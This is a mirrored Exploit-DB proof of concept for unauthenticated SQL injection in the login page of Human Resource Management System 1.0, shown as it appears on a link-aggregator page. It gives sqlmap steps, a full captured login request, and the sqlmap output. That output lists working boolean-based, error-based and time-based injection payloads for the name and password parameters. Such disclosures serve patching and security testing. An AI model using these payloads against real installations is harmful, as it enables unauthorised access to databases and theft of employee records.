[webapps] Human Resource Management System 1.0 - SQL Injection (unauthenticated)
source link: https://www.exploit-db.com/exploits/51125
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
Human Resource Management System 1.0 - SQL Injection (unauthenticated)
EDB-ID:
51125
EDB Verified:
# Exploit Title: Human Resource Management System - SQL Injection (unauthenticated)
# Date: 08-11-2022
# Exploit Author: Matthijs van der Vaart (eMVee)
# Vendor Homepage: https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/hrm.zip
# Version: 1.0 (Monday, October 10, 2022 - 13:37)
# Tested On: Windows 10 Pro 10.0.19044 N/A Build 1288 + XAMPP V3.3.0
1) Capture the login POST request with Burp Suite or OWASP ZAP
2) Save the request as "login.req"
3) Run sqlmap as follows: "sqlmap -r login.req"
Example login.req
==========
POST /controller/login.php HTTP/1.1
Host: target
Cookie: csrf_token_f58f5b43e3803b8c3c224afd706cf0f9927d9fd3c222740171d746d078b1ac9b=h1qG45IggxzwQ/i1lH2zBF7ktvDJT716RNl59LQTkwk=; PHPSESSID=kg0h3kpsbf2r3mnmbmmap2afda
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 66
Origin: https://target
Referer: https://target/index.php<https://10.0.2.15/dashboard/hrm/index.php>
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
name=admin%40gmail.com&password=password+&submit=Sign+In
=========
Output example SQL Injection unauthenticated login page
==========
POST parameter 'password' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 1143 HTTP(s) requests:
---
Parameter: password (POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: [email protected]&password=password ' RLIKE (SELECT (CASE WHEN (7213=7213) THEN 0x70617373776f726420 ELSE 0x28 END))-- ylOf&submit=Sign In
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: [email protected]&password=password ' OR (SELECT 8513 FROM(SELECT COUNT(*),CONCAT(0x7176787871,(SELECT (ELT(8513=8513,1))),0x716a7a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- RBnO&submit=Sign In
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: [email protected]&password=password ' AND (SELECT 4404 FROM (SELECT(SLEEP(5)))eQTb)-- NTCP&submit=Sign In
Parameter: name (POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: [email protected]' RLIKE (SELECT (CASE WHEN (2620=2620) THEN 0x61646d696e40676d61696c2e636f6d ELSE 0x28 END))-- KlrV&password=password &submit=Sign In
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: [email protected]' AND (SELECT 7287 FROM(SELECT COUNT(*),CONCAT(0x7176787871,(SELECT (ELT(7287=7287,1))),0x716a7a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- fSRz&password=password &submit=Sign In
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: [email protected]' AND (SELECT 8912 FROM (SELECT(SLEEP(5)))NCtJ)-- ennA&password=password &submit=Sign In
---
there were multiple injection points, please select the one to use for following injections:
[0] place: POST, parameter: name, type: Single quoted string (default)
[1] place: POST, parameter: password, type: Single quoted string
==========
Recommend
-
7
Senayan Library Management System v9.5.0 - SQL Injection ...
-
4
EQ Enterprise management system v2.2.0 - SQL Injection ...
-
9
Art Gallery Management System Project v1.0 - SQL Injection (sqli) authenticated...
-
7
Intern Record System v1.0 - SQL Injection (Unauthenticated)
-
8
Simple Task Managing System v1.0 - SQL Injection (Unauthenticated)...
-
14
Online Pizza Ordering System v1.0 - Unauthenticated File Upload...
-
9
Best POS Management System v1.0 - Unauthenticated Remote Code Execution...
-
14
PnPSCADA v2.x - Unauthenticated PostgreSQL Injection ...
-
13
Faculty Evaluation System 1.0 - Unauthenticated File Upload
-
13
Online Piggery Management System v1.0 - unauthenticated file upload vulnerability...
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK